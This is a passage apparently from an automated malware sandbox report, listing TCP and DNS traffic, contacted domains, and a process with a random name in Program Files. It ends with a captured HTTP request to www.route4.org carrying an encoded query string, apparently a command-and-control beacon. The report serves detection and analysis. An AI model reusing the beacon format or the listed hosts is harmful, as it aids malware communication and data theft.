                      Sep 13, 2024 12:28:47.744946957 CEST | 80 | 50421 | 3.33.130.190 | 192.168.2.4
                      Sep 13, 2024 12:28:47.745104074 CEST | 80 | 50421 | 3.33.130.190 | 192.168.2.4
                      Sep 13, 2024 12:28:47.750673056 CEST | 50421 | 80 | 192.168.2.4 | 3.33.130.190
                      Sep 13, 2024 12:28:47.751498938 CEST | 50421 | 80 | 192.168.2.4 | 3.33.130.190
                      Sep 13, 2024 12:28:47.758618116 CEST | 80 | 50421 | 3.33.130.190 | 192.168.2.4
                      Sep 13, 2024 12:29:00.958621979 CEST | 50422 | 80 | 192.168.2.4 | 199.59.243.226
                      Sep 13, 2024 12:29:00.963485956 CEST | 80 | 50422 | 199.59.243.226 | 192.168.2.4
                      Sep 13, 2024 12:29:00.963601112 CEST | 50422 | 80 | 192.168.2.4 | 199.59.243.226
                      Sep 13, 2024 12:29:00.973885059 CEST | 50422 | 80 | 192.168.2.4 | 199.59.243.226
                      Sep 13, 2024 12:29:00.978800058 CEST | 80 | 50422 | 199.59.243.226 | 192.168.2.4
                      Sep 13, 2024 12:29:01.457920074 CEST | 80 | 50422 | 199.59.243.226 | 192.168.2.4
                      Sep 13, 2024 12:29:01.458409071 CEST | 80 | 50422 | 199.59.243.226 | 192.168.2.4
                      Sep 13, 2024 12:29:01.458414078 CEST | 80 | 50422 | 199.59.243.226 | 192.168.2.4
                      Sep 13, 2024 12:29:01.458587885 CEST | 50422 | 80 | 192.168.2.4 | 199.59.243.226
                      Sep 13, 2024 12:29:02.489105940 CEST | 50422 | 80 | 192.168.2.4 | 199.59.243.226
                      Sep 13, 2024 12:29:03.535234928 CEST | 50423 | 80 | 192.168.2.4 | 199.59.243.226
                      Sep 13, 2024 12:29:03.548396111 CEST | 80 | 50423 | 199.59.243.226 | 192.168.2.4
                      Sep 13, 2024 12:29:03.549143076 CEST | 50423 | 80 | 192.168.2.4 | 199.59.243.226
                      Sep 13, 2024 12:29:03.568825006 CEST | 50423 | 80 | 192.168.2.4 | 199.59.243.226
                      Sep 13, 2024 12:29:03.576730967 CEST | 80 | 50423 | 199.59.243.226 | 192.168.2.4
                      Sep 13, 2024 12:29:04.037043095 CEST | 80 | 50423 | 199.59.243.226 | 192.168.2.4
                      Sep 13, 2024 12:29:04.037086010 CEST | 80 | 50423 | 199.59.243.226 | 192.168.2.4
                      Sep 13, 2024 12:29:04.037142992 CEST | 50423 | 80 | 192.168.2.4 | 199.59.243.226
                      Sep 13, 2024 12:29:04.037573099 CEST | 80 | 50423 | 199.59.243.226 | 192.168.2.4
                      Sep 13, 2024 12:29:04.037626028 CEST | 50423 | 80 | 192.168.2.4 | 199.59.243.226
                      Sep 13, 2024 12:29:05.082865953 CEST | 50423 | 80 | 192.168.2.4 | 199.59.243.226
                      Sep 13, 2024 12:29:06.123575926 CEST | 50424 | 80 | 192.168.2.4 | 199.59.243.226
                      Sep 13, 2024 12:29:06.128446102 CEST | 80 | 50424 | 199.59.243.226 | 192.168.2.4
                      Sep 13, 2024 12:29:06.128509045 CEST | 50424 | 80 | 192.168.2.4 | 199.59.243.226
                      Sep 13, 2024 12:29:06.139482975 CEST | 50424 | 80 | 192.168.2.4 | 199.59.243.226
                      Sep 13, 2024 12:29:06.144516945 CEST | 80 | 50424 | 199.59.243.226 | 192.168.2.4
                      Sep 13, 2024 12:29:06.144542933 CEST | 80 | 50424 | 199.59.243.226 | 192.168.2.4
                      Sep 13, 2024 12:29:06.144551039 CEST | 80 | 50424 | 199.59.243.226 | 192.168.2.4
                      Sep 13, 2024 12:29:06.144568920 CEST | 80 | 50424 | 199.59.243.226 | 192.168.2.4
                      Sep 13, 2024 12:29:06.144576073 CEST | 80 | 50424 | 199.59.243.226 | 192.168.2.4
                      Sep 13, 2024 12:29:06.144582033 CEST | 80 | 50424 | 199.59.243.226 | 192.168.2.4
                      Sep 13, 2024 12:29:06.144587040 CEST | 80 | 50424 | 199.59.243.226 | 192.168.2.4
                      Sep 13, 2024 12:29:06.144593000 CEST | 80 | 50424 | 199.59.243.226 | 192.168.2.4
                      Sep 13, 2024 12:29:06.144598961 CEST | 80 | 50424 | 199.59.243.226 | 192.168.2.4
                      Sep 13, 2024 12:29:06.625369072 CEST | 80 | 50424 | 199.59.243.226 | 192.168.2.4
                      Sep 13, 2024 12:29:06.625754118 CEST | 80 | 50424 | 199.59.243.226 | 192.168.2.4
                      Sep 13, 2024 12:29:06.625762939 CEST | 80 | 50424 | 199.59.243.226 | 192.168.2.4
                      Sep 13, 2024 12:29:06.625794888 CEST | 50424 | 80 | 192.168.2.4 | 199.59.243.226
                      Sep 13, 2024 12:29:06.625822067 CEST | 50424 | 80 | 192.168.2.4 | 199.59.243.226
                      Sep 13, 2024 12:29:07.646708965 CEST | 50424 | 80 | 192.168.2.4 | 199.59.243.226
                      Sep 13, 2024 12:29:08.663840055 CEST | 50425 | 80 | 192.168.2.4 | 199.59.243.226
                      Sep 13, 2024 12:29:08.668885946 CEST | 80 | 50425 | 199.59.243.226 | 192.168.2.4
                      Sep 13, 2024 12:29:08.668967962 CEST | 50425 | 80 | 192.168.2.4 | 199.59.243.226
                      Sep 13, 2024 12:29:08.675864935 CEST | 50425 | 80 | 192.168.2.4 | 199.59.243.226
                      Sep 13, 2024 12:29:08.680845976 CEST | 80 | 50425 | 199.59.243.226 | 192.168.2.4
                      Sep 13, 2024 12:29:09.136223078 CEST | 80 | 50425 | 199.59.243.226 | 192.168.2.4
                      Sep 13, 2024 12:29:09.136499882 CEST | 80 | 50425 | 199.59.243.226 | 192.168.2.4
                      Sep 13, 2024 12:29:09.136503935 CEST | 80 | 50425 | 199.59.243.226 | 192.168.2.4
                      Sep 13, 2024 12:29:09.136694908 CEST | 50425 | 80 | 192.168.2.4 | 199.59.243.226
                      Sep 13, 2024 12:29:09.139133930 CEST | 50425 | 80 | 192.168.2.4 | 199.59.243.226
                      Sep 13, 2024 12:29:09.143971920 CEST | 80 | 50425 | 199.59.243.226 | 192.168.2.4
                      Sep 13, 2024 12:29:14.205454111 CEST | 50426 | 80 | 192.168.2.4 | 162.241.226.190
                      Sep 13, 2024 12:29:14.212407112 CEST | 80 | 50426 | 162.241.226.190 | 192.168.2.4
                      Sep 13, 2024 12:29:14.212475061 CEST | 50426 | 80 | 192.168.2.4 | 162.241.226.190
                      Sep 13, 2024 12:29:14.322768927 CEST | 50426 | 80 | 192.168.2.4 | 162.241.226.190
                      Sep 13, 2024 12:29:14.327686071 CEST | 80 | 50426 | 162.241.226.190 | 192.168.2.4
                      Sep 13, 2024 12:29:14.920083046 CEST | 80 | 50426 | 162.241.226.190 | 192.168.2.4
                      Sep 13, 2024 12:29:14.920099974 CEST | 80 | 50426 | 162.241.226.190 | 192.168.2.4
                      Sep 13, 2024 12:29:14.920111895 CEST | 80 | 50426 | 162.241.226.190 | 192.168.2.4
                      Sep 13, 2024 12:29:14.920188904 CEST | 50426 | 80 | 192.168.2.4 | 162.241.226.190
                      Sep 13, 2024 12:29:14.920190096 CEST | 50426 | 80 | 192.168.2.4 | 162.241.226.190
                      Sep 13, 2024 12:29:15.832721949 CEST | 50426 | 80 | 192.168.2.4 | 162.241.226.190
                      Sep 13, 2024 12:29:16.857779026 CEST | 50427 | 80 | 192.168.2.4 | 162.241.226.190
                      Sep 13, 2024 12:29:16.864345074 CEST | 80 | 50427 | 162.241.226.190 | 192.168.2.4
                      Sep 13, 2024 12:29:16.864459038 CEST | 50427 | 80 | 192.168.2.4 | 162.241.226.190
                      Sep 13, 2024 12:29:16.876532078 CEST | 50427 | 80 | 192.168.2.4 | 162.241.226.190
                      Sep 13, 2024 12:29:16.882390022 CEST | 80 | 50427 | 162.241.226.190 | 192.168.2.4
                      Sep 13, 2024 12:29:17.468024015 CEST | 80 | 50427 | 162.241.226.190 | 192.168.2.4
                      Sep 13, 2024 12:29:17.468199968 CEST | 80 | 50427 | 162.241.226.190 | 192.168.2.4
                      Sep 13, 2024 12:29:17.468744040 CEST | 50427 | 80 | 192.168.2.4 | 162.241.226.190
                      Sep 13, 2024 12:29:18.379573107 CEST | 50427 | 80 | 192.168.2.4 | 162.241.226.190
                      Sep 13, 2024 12:29:19.406620026 CEST | 50428 | 80 | 192.168.2.4 | 162.241.226.190
                      Sep 13, 2024 12:29:19.414068937 CEST | 80 | 50428 | 162.241.226.190 | 192.168.2.4
                      Sep 13, 2024 12:29:19.414292097 CEST | 50428 | 80 | 192.168.2.4 | 162.241.226.190
                      Sep 13, 2024 12:29:19.425220013 CEST | 50428 | 80 | 192.168.2.4 | 162.241.226.190
                      Sep 13, 2024 12:29:19.434923887 CEST | 80 | 50428 | 162.241.226.190 | 192.168.2.4
                      Sep 13, 2024 12:29:19.434932947 CEST | 80 | 50428 | 162.241.226.190 | 192.168.2.4
                      Sep 13, 2024 12:29:19.434936047 CEST | 80 | 50428 | 162.241.226.190 | 192.168.2.4
                      Sep 13, 2024 12:29:19.434938908 CEST | 80 | 50428 | 162.241.226.190 | 192.168.2.4
                      Sep 13, 2024 12:29:19.434942961 CEST | 80 | 50428 | 162.241.226.190 | 192.168.2.4
                      Sep 13, 2024 12:29:19.435050011 CEST | 80 | 50428 | 162.241.226.190 | 192.168.2.4
                      Sep 13, 2024 12:29:19.435053110 CEST | 80 | 50428 | 162.241.226.190 | 192.168.2.4
                      Sep 13, 2024 12:29:19.435060978 CEST | 80 | 50428 | 162.241.226.190 | 192.168.2.4
                      Sep 13, 2024 12:29:19.435555935 CEST | 80 | 50428 | 162.241.226.190 | 192.168.2.4
                      Sep 13, 2024 12:29:20.079303980 CEST | 80 | 50428 | 162.241.226.190 | 192.168.2.4
                      Sep 13, 2024 12:29:20.081110001 CEST | 80 | 50428 | 162.241.226.190 | 192.168.2.4
                      Sep 13, 2024 12:29:20.081191063 CEST | 50428 | 80 | 192.168.2.4 | 162.241.226.190
                      Sep 13, 2024 12:29:20.926470041 CEST | 50428 | 80 | 192.168.2.4 | 162.241.226.190
                      Sep 13, 2024 12:29:21.945591927 CEST | 50429 | 80 | 192.168.2.4 | 162.241.226.190
                      Sep 13, 2024 12:29:22.265465021 CEST | 80 | 50429 | 162.241.226.190 | 192.168.2.4
                      Sep 13, 2024 12:29:22.265535116 CEST | 50429 | 80 | 192.168.2.4 | 162.241.226.190
                      Sep 13, 2024 12:29:22.274085999 CEST | 50429 | 80 | 192.168.2.4 | 162.241.226.190
                      Sep 13, 2024 12:29:22.279613972 CEST | 80 | 50429 | 162.241.226.190 | 192.168.2.4
                      Sep 13, 2024 12:29:22.922122002 CEST | 80 | 50429 | 162.241.226.190 | 192.168.2.4
                      Sep 13, 2024 12:29:22.922666073 CEST | 80 | 50429 | 162.241.226.190 | 192.168.2.4
                      Sep 13, 2024 12:29:22.926625013 CEST | 50429 | 80 | 192.168.2.4 | 162.241.226.190
                      Sep 13, 2024 12:29:22.926625013 CEST | 50429 | 80 | 192.168.2.4 | 162.241.226.190
                      Sep 13, 2024 12:29:22.937216043 CEST | 80 | 50429 | 162.241.226.190 | 192.168.2.4
                      Sep 13, 2024 12:29:29.056906939 CEST | 50430 | 80 | 192.168.2.4 | 91.215.85.23
                      Sep 13, 2024 12:29:29.061918974 CEST | 80 | 50430 | 91.215.85.23 | 192.168.2.4
                      Sep 13, 2024 12:29:29.068639994 CEST | 50430 | 80 | 192.168.2.4 | 91.215.85.23
                      Sep 13, 2024 12:29:29.077130079 CEST | 50430 | 80 | 192.168.2.4 | 91.215.85.23
                      Sep 13, 2024 12:29:29.082274914 CEST | 80 | 50430 | 91.215.85.23 | 192.168.2.4
                      Sep 13, 2024 12:29:29.797451019 CEST | 80 | 50430 | 91.215.85.23 | 192.168.2.4
                      Sep 13, 2024 12:29:29.797916889 CEST | 80 | 50430 | 91.215.85.23 | 192.168.2.4
                      Sep 13, 2024 12:29:29.806639910 CEST | 50430 | 80 | 192.168.2.4 | 91.215.85.23
                      Sep 13, 2024 12:29:30.582904100 CEST | 50430 | 80 | 192.168.2.4 | 91.215.85.23
                      Sep 13, 2024 12:29:31.601289988 CEST | 50431 | 80 | 192.168.2.4 | 91.215.85.23
                      Sep 13, 2024 12:29:31.608864069 CEST | 80 | 50431 | 91.215.85.23 | 192.168.2.4
                      Sep 13, 2024 12:29:31.609319925 CEST | 50431 | 80 | 192.168.2.4 | 91.215.85.23
                      Sep 13, 2024 12:29:31.621857882 CEST | 50431 | 80 | 192.168.2.4 | 91.215.85.23
                      Sep 13, 2024 12:29:31.627937078 CEST | 80 | 50431 | 91.215.85.23 | 192.168.2.4
                      Sep 13, 2024 12:29:32.306646109 CEST | 80 | 50431 | 91.215.85.23 | 192.168.2.4
                      Sep 13, 2024 12:29:32.306997061 CEST | 80 | 50431 | 91.215.85.23 | 192.168.2.4
                      Sep 13, 2024 12:29:32.307060003 CEST | 50431 | 80 | 192.168.2.4 | 91.215.85.23
                      Sep 13, 2024 12:29:33.134644985 CEST | 50431 | 80 | 192.168.2.4 | 91.215.85.23
                      Sep 13, 2024 12:29:34.148972988 CEST | 50432 | 80 | 192.168.2.4 | 91.215.85.23
                      Sep 13, 2024 12:29:34.240849972 CEST | 80 | 50432 | 91.215.85.23 | 192.168.2.4
                      Sep 13, 2024 12:29:34.240911007 CEST | 50432 | 80 | 192.168.2.4 | 91.215.85.23
                      Sep 13, 2024 12:29:34.260888100 CEST | 50432 | 80 | 192.168.2.4 | 91.215.85.23
                      Sep 13, 2024 12:29:34.260910988 CEST | 50432 | 80 | 192.168.2.4 | 91.215.85.23
                      Sep 13, 2024 12:29:34.266891956 CEST | 80 | 50432 | 91.215.85.23 | 192.168.2.4
                      Sep 13, 2024 12:29:34.266956091 CEST | 80 | 50432 | 91.215.85.23 | 192.168.2.4
                      Sep 13, 2024 12:29:34.267014980 CEST | 80 | 50432 | 91.215.85.23 | 192.168.2.4
                      Sep 13, 2024 12:29:34.267112970 CEST | 80 | 50432 | 91.215.85.23 | 192.168.2.4
                      Sep 13, 2024 12:29:34.267142057 CEST | 80 | 50432 | 91.215.85.23 | 192.168.2.4
                      Sep 13, 2024 12:29:34.267206907 CEST | 80 | 50432 | 91.215.85.23 | 192.168.2.4
                      Sep 13, 2024 12:29:34.267235041 CEST | 80 | 50432 | 91.215.85.23 | 192.168.2.4
                      Sep 13, 2024 12:29:34.267658949 CEST | 80 | 50432 | 91.215.85.23 | 192.168.2.4
                      Sep 13, 2024 12:29:34.267687082 CEST | 80 | 50432 | 91.215.85.23 | 192.168.2.4
                      Sep 13, 2024 12:29:34.937767982 CEST | 80 | 50432 | 91.215.85.23 | 192.168.2.4
                      Sep 13, 2024 12:29:34.992743969 CEST | 50432 | 80 | 192.168.2.4 | 91.215.85.23
                      Sep 13, 2024 12:29:35.066162109 CEST | 80 | 50432 | 91.215.85.23 | 192.168.2.4
                      Sep 13, 2024 12:29:35.072773933 CEST | 50432 | 80 | 192.168.2.4 | 91.215.85.23
                      Sep 13, 2024 12:29:35.773086071 CEST | 50432 | 80 | 192.168.2.4 | 91.215.85.23
                      Sep 13, 2024 12:29:36.789824009 CEST | 50433 | 80 | 192.168.2.4 | 91.215.85.23
                      Sep 13, 2024 12:29:36.795207024 CEST | 80 | 50433 | 91.215.85.23 | 192.168.2.4
                      Sep 13, 2024 12:29:36.795300961 CEST | 50433 | 80 | 192.168.2.4 | 91.215.85.23
                      Sep 13, 2024 12:29:36.805512905 CEST | 50433 | 80 | 192.168.2.4 | 91.215.85.23
                      Sep 13, 2024 12:29:36.811886072 CEST | 80 | 50433 | 91.215.85.23 | 192.168.2.4
                      Sep 13, 2024 12:29:37.516345978 CEST | 80 | 50433 | 91.215.85.23 | 192.168.2.4
                      Sep 13, 2024 12:29:37.516374111 CEST | 80 | 50433 | 91.215.85.23 | 192.168.2.4
                      Sep 13, 2024 12:29:37.516396046 CEST | 80 | 50433 | 91.215.85.23 | 192.168.2.4
                      Sep 13, 2024 12:29:37.516410112 CEST | 80 | 50433 | 91.215.85.23 | 192.168.2.4
                      Sep 13, 2024 12:29:37.516431093 CEST | 80 | 50433 | 91.215.85.23 | 192.168.2.4
                      Sep 13, 2024 12:29:37.516467094 CEST | 80 | 50433 | 91.215.85.23 | 192.168.2.4
                      Sep 13, 2024 12:29:37.516483068 CEST | 80 | 50433 | 91.215.85.23 | 192.168.2.4
                      Sep 13, 2024 12:29:37.516516924 CEST | 80 | 50433 | 91.215.85.23 | 192.168.2.4
                      Sep 13, 2024 12:29:37.516534090 CEST | 80 | 50433 | 91.215.85.23 | 192.168.2.4
                      Sep 13, 2024 12:29:37.516534090 CEST | 50433 | 80 | 192.168.2.4 | 91.215.85.23
                      Sep 13, 2024 12:29:37.516590118 CEST | 80 | 50433 | 91.215.85.23 | 192.168.2.4
                      Sep 13, 2024 12:29:37.516613960 CEST | 50433 | 80 | 192.168.2.4 | 91.215.85.23
                      Sep 13, 2024 12:29:37.516613960 CEST | 50433 | 80 | 192.168.2.4 | 91.215.85.23
                      Sep 13, 2024 12:29:37.517033100 CEST | 50433 | 80 | 192.168.2.4 | 91.215.85.23
                      Sep 13, 2024 12:29:37.526339054 CEST | 80 | 50433 | 91.215.85.23 | 192.168.2.4
                      Sep 13, 2024 12:29:37.526634932 CEST | 80 | 50433 | 91.215.85.23 | 192.168.2.4
                      Sep 13, 2024 12:29:37.527153969 CEST | 50433 | 80 | 192.168.2.4 | 91.215.85.23
                      Sep 13, 2024 12:29:37.532932997 CEST | 50433 | 80 | 192.168.2.4 | 91.215.85.23
                      Sep 13, 2024 12:29:37.539340973 CEST | 80 | 50433 | 91.215.85.23 | 192.168.2.4
                      Timestamp | Source Port | Dest Port | Source IP | Dest IP
                      Sep 13, 2024 12:26:59.657924891 CEST | 50349 | 53 | 192.168.2.4 | 1.1.1.1
                      Sep 13, 2024 12:27:00.641196012 CEST | 53 | 50349 | 1.1.1.1 | 192.168.2.4
                      Sep 13, 2024 12:27:02.465179920 CEST | 53 | 53213 | 162.159.36.2 | 192.168.2.4
                      Sep 13, 2024 12:27:02.969276905 CEST | 60055 | 53 | 192.168.2.4 | 1.1.1.1
                      Sep 13, 2024 12:27:03.041141033 CEST | 53 | 60055 | 1.1.1.1 | 192.168.2.4
                      Sep 13, 2024 12:27:05.651211977 CEST | 63219 | 53 | 192.168.2.4 | 1.1.1.1
                      Sep 13, 2024 12:27:05.662040949 CEST | 53 | 63219 | 1.1.1.1 | 192.168.2.4
                      Sep 13, 2024 12:27:10.681729078 CEST | 62725 | 53 | 192.168.2.4 | 1.1.1.1
                      Sep 13, 2024 12:27:11.187170982 CEST | 53 | 62725 | 1.1.1.1 | 192.168.2.4
                      Sep 13, 2024 12:27:27.523442030 CEST | 57254 | 53 | 192.168.2.4 | 1.1.1.1
                      Sep 13, 2024 12:27:27.533168077 CEST | 53 | 57254 | 1.1.1.1 | 192.168.2.4
                      Sep 13, 2024 12:27:35.594134092 CEST | 51922 | 53 | 192.168.2.4 | 1.1.1.1
                      Sep 13, 2024 12:27:35.691088915 CEST | 53 | 51922 | 1.1.1.1 | 192.168.2.4
                      Sep 13, 2024 12:27:49.135979891 CEST | 56849 | 53 | 192.168.2.4 | 1.1.1.1
                      Sep 13, 2024 12:27:49.651725054 CEST | 53 | 56849 | 1.1.1.1 | 192.168.2.4
                      Sep 13, 2024 12:28:03.118635893 CEST | 54292 | 53 | 192.168.2.4 | 1.1.1.1
                      Sep 13, 2024 12:28:03.544994116 CEST | 53 | 54292 | 1.1.1.1 | 192.168.2.4
                      Sep 13, 2024 12:28:17.132832050 CEST | 55896 | 53 | 192.168.2.4 | 1.1.1.1
                      Sep 13, 2024 12:28:17.678682089 CEST | 53 | 55896 | 1.1.1.1 | 192.168.2.4
                      Sep 13, 2024 12:28:31.509536028 CEST | 51864 | 53 | 192.168.2.4 | 1.1.1.1
                      Sep 13, 2024 12:28:31.529308081 CEST | 53 | 51864 | 1.1.1.1 | 192.168.2.4
                      Sep 13, 2024 12:28:39.601032972 CEST | 62622 | 53 | 192.168.2.4 | 1.1.1.1
                      Sep 13, 2024 12:28:39.616849899 CEST | 53 | 62622 | 1.1.1.1 | 192.168.2.4
                      Sep 13, 2024 12:28:52.791443110 CEST | 64587 | 53 | 192.168.2.4 | 1.1.1.1
                      Sep 13, 2024 12:28:52.807446003 CEST | 53 | 64587 | 1.1.1.1 | 192.168.2.4
                      Sep 13, 2024 12:29:00.870595932 CEST | 54285 | 53 | 192.168.2.4 | 1.1.1.1
                      Sep 13, 2024 12:29:00.933579922 CEST | 53 | 54285 | 1.1.1.1 | 192.168.2.4
                      Sep 13, 2024 12:29:14.161935091 CEST | 51553 | 53 | 192.168.2.4 | 1.1.1.1
                      Sep 13, 2024 12:29:14.184401035 CEST | 53 | 51553 | 1.1.1.1 | 192.168.2.4
                      Sep 13, 2024 12:29:27.929528952 CEST | 57482 | 53 | 192.168.2.4 | 1.1.1.1
                      Sep 13, 2024 12:29:28.942620993 CEST | 57482 | 53 | 192.168.2.4 | 1.1.1.1
                      Sep 13, 2024 12:29:29.049941063 CEST | 53 | 57482 | 1.1.1.1 | 192.168.2.4
                      Sep 13, 2024 12:29:29.049952984 CEST | 53 | 57482 | 1.1.1.1 | 192.168.2.4
                      Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                      Sep 13, 2024 12:26:59.657924891 CEST | 192.168.2.4 | 1.1.1.1 | 0x987f | Standard query (0) | www.teksales.space | A (IP address) | IN (0x0001) | false
                      Sep 13, 2024 12:27:02.969276905 CEST | 192.168.2.4 | 1.1.1.1 | 0xf521 | Standard query (0) | 56.126.166.20.in-addr.arpa | PTR (Pointer record) | IN (0x0001) | false
                      Sep 13, 2024 12:27:05.651211977 CEST | 192.168.2.4 | 1.1.1.1 | 0x3ae | Standard query (0) | www.linkbasic.net | A (IP address) | IN (0x0001) | false
                      Sep 13, 2024 12:27:10.681729078 CEST | 192.168.2.4 | 1.1.1.1 | 0x9108 | Standard query (0) | www.route4.org | A (IP address) | IN (0x0001) | false
                      Sep 13, 2024 12:27:27.523442030 CEST | 192.168.2.4 | 1.1.1.1 | 0x9841 | Standard query (0) | www.meery.store | A (IP address) | IN (0x0001) | false
                      Sep 13, 2024 12:27:35.594134092 CEST | 192.168.2.4 | 1.1.1.1 | 0x6f02 | Standard query (0) | www.subitoadomicilio.shop | A (IP address) | IN (0x0001) | false
                      Sep 13, 2024 12:27:49.135979891 CEST | 192.168.2.4 | 1.1.1.1 | 0x4fc4 | Standard query (0) | www.syvra.xyz | A (IP address) | IN (0x0001) | false
                      Sep 13, 2024 12:28:03.118635893 CEST | 192.168.2.4 | 1.1.1.1 | 0x1e17 | Standard query (0) | www.hm62t.top | A (IP address) | IN (0x0001) | false
                      Sep 13, 2024 12:28:17.132832050 CEST | 192.168.2.4 | 1.1.1.1 | 0x65b4 | Standard query (0) | www.zhuoyueapp.top | A (IP address) | IN (0x0001) | false
                      Sep 13, 2024 12:28:31.509536028 CEST | 192.168.2.4 | 1.1.1.1 | 0xb924 | Standard query (0) | www.pelus-pijama-pro.shop | A (IP address) | IN (0x0001) | false
                      Sep 13, 2024 12:28:39.601032972 CEST | 192.168.2.4 | 1.1.1.1 | 0x5717 | Standard query (0) | www.autonashville.com | A (IP address) | IN (0x0001) | false
                      Sep 13, 2024 12:28:52.791443110 CEST | 192.168.2.4 | 1.1.1.1 | 0x5d1 | Standard query (0) | www.torkstallningar.shop | A (IP address) | IN (0x0001) | false
                      Sep 13, 2024 12:29:00.870595932 CEST | 192.168.2.4 | 1.1.1.1 | 0x28bf | Standard query (0) | www.dom-2.online | A (IP address) | IN (0x0001) | false
                      Sep 13, 2024 12:29:14.161935091 CEST | 192.168.2.4 | 1.1.1.1 | 0x136 | Standard query (0) | www.easyanalytics.site | A (IP address) | IN (0x0001) | false
                      Sep 13, 2024 12:29:27.929528952 CEST | 192.168.2.4 | 1.1.1.1 | 0xabb0 | Standard query (0) | www.kalomor.top | A (IP address) | IN (0x0001) | false
                      Sep 13, 2024 12:29:28.942620993 CEST | 192.168.2.4 | 1.1.1.1 | 0xabb0 | Standard query (0) | www.kalomor.top | A (IP address) | IN (0x0001) | false
                      Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                      Sep 13, 2024 12:27:00.641196012 CEST | 1.1.1.1 | 192.168.2.4 | 0x987f | Name error (3) | www.teksales.space | none | none | A (IP address) | IN (0x0001) | false
                      Sep 13, 2024 12:27:03.041141033 CEST | 1.1.1.1 | 192.168.2.4 | 0xf521 | Name error (3) | 56.126.166.20.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001) | false
                      Sep 13, 2024 12:27:05.662040949 CEST | 1.1.1.1 | 192.168.2.4 | 0x3ae | Name error (3) | www.linkbasic.net | none | none | A (IP address) | IN (0x0001) | false
                      Sep 13, 2024 12:27:11.187170982 CEST | 1.1.1.1 | 192.168.2.4 | 0x9108 | No error (0) | www.route4.org |  | 34.150.58.73 | A (IP address) | IN (0x0001) | false
                      Sep 13, 2024 12:27:27.533168077 CEST | 1.1.1.1 | 192.168.2.4 | 0x9841 | Name error (3) | www.meery.store | none | none | A (IP address) | IN (0x0001) | false
                      Sep 13, 2024 12:27:35.691088915 CEST | 1.1.1.1 | 192.168.2.4 | 0x6f02 | No error (0) | www.subitoadomicilio.shop |  | 195.24.68.25 | A (IP address) | IN (0x0001) | false
                      Sep 13, 2024 12:27:49.651725054 CEST | 1.1.1.1 | 192.168.2.4 | 0x4fc4 | No error (0) | www.syvra.xyz |  | 162.0.213.94 | A (IP address) | IN (0x0001) | false
                      Sep 13, 2024 12:28:03.544994116 CEST | 1.1.1.1 | 192.168.2.4 | 0x1e17 | No error (0) | www.hm62t.top | hm62t.top |  | CNAME (Canonical name) | IN (0x0001) | false
                      Sep 13, 2024 12:28:03.544994116 CEST | 1.1.1.1 | 192.168.2.4 | 0x1e17 | No error (0) | hm62t.top |  | 154.23.184.240 | A (IP address) | IN (0x0001) | false
                      Sep 13, 2024 12:28:17.678682089 CEST | 1.1.1.1 | 192.168.2.4 | 0x65b4 | No error (0) | www.zhuoyueapp.top |  | 47.104.180.139 | A (IP address) | IN (0x0001) | false
                      Sep 13, 2024 12:28:31.529308081 CEST | 1.1.1.1 | 192.168.2.4 | 0xb924 | Name error (3) | www.pelus-pijama-pro.shop | none | none | A (IP address) | IN (0x0001) | false
                      Sep 13, 2024 12:28:39.616849899 CEST | 1.1.1.1 | 192.168.2.4 | 0x5717 | No error (0) | www.autonashville.com | autonashville.com |  | CNAME (Canonical name) | IN (0x0001) | false
                      Sep 13, 2024 12:28:39.616849899 CEST | 1.1.1.1 | 192.168.2.4 | 0x5717 | No error (0) | autonashville.com |  | 3.33.130.190 | A (IP address) | IN (0x0001) | false
                      Sep 13, 2024 12:28:39.616849899 CEST | 1.1.1.1 | 192.168.2.4 | 0x5717 | No error (0) | autonashville.com |  | 15.197.148.33 | A (IP address) | IN (0x0001) | false
                      Sep 13, 2024 12:28:52.807446003 CEST | 1.1.1.1 | 192.168.2.4 | 0x5d1 | Name error (3) | www.torkstallningar.shop | none | none | A (IP address) | IN (0x0001) | false
                      Sep 13, 2024 12:29:00.933579922 CEST | 1.1.1.1 | 192.168.2.4 | 0x28bf | No error (0) | www.dom-2.online |  | 199.59.243.226 | A (IP address) | IN (0x0001) | false
                      Sep 13, 2024 12:29:14.184401035 CEST | 1.1.1.1 | 192.168.2.4 | 0x136 | No error (0) | www.easyanalytics.site | easyanalytics.site |  | CNAME (Canonical name) | IN (0x0001) | false
                      Sep 13, 2024 12:29:14.184401035 CEST | 1.1.1.1 | 192.168.2.4 | 0x136 | No error (0) | easyanalytics.site |  | 162.241.226.190 | A (IP address) | IN (0x0001) | false
                      Sep 13, 2024 12:29:29.049941063 CEST | 1.1.1.1 | 192.168.2.4 | 0xabb0 | No error (0) | www.kalomor.top | kalomor.top |  | CNAME (Canonical name) | IN (0x0001) | false
                      Sep 13, 2024 12:29:29.049941063 CEST | 1.1.1.1 | 192.168.2.4 | 0xabb0 | No error (0) | kalomor.top |  | 91.215.85.23 | A (IP address) | IN (0x0001) | false
                      Sep 13, 2024 12:29:29.049952984 CEST | 1.1.1.1 | 192.168.2.4 | 0xabb0 | No error (0) | www.kalomor.top | kalomor.top |  | CNAME (Canonical name) | IN (0x0001) | false
                      Sep 13, 2024 12:29:29.049952984 CEST | 1.1.1.1 | 192.168.2.4 | 0xabb0 | No error (0) | kalomor.top |  | 91.215.85.23 | A (IP address) | IN (0x0001) | false
                      • www.route4.org
                      • www.subitoadomicilio.shop
                      • www.syvra.xyz
                      • www.hm62t.top
                      • www.zhuoyueapp.top
                      • www.autonashville.com
                      • www.dom-2.online
                      • www.easyanalytics.site
                      • www.kalomor.top
                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      0 | 192.168.2.4 | 50401 | 34.150.58.73 | 80 | 3120 | C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Sep 13, 2024 12:27:11.216728926 CEST | 480 | OUT | GET /65ev/?MtXH8dRH=dwwIBvsgoPduu1x03LiLu+lQGDFRz/zz5BoPsCvlGePibN32srUYcBSr/DN58z3DeItGY9KIy82Fautrr2SZe1nede/ReFPQiUe32Ik0HHEAi+oCxkmAYmk=&EB04T=0hSTF8phw HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.9
                      Host: www.route4.org
                      Connection: close
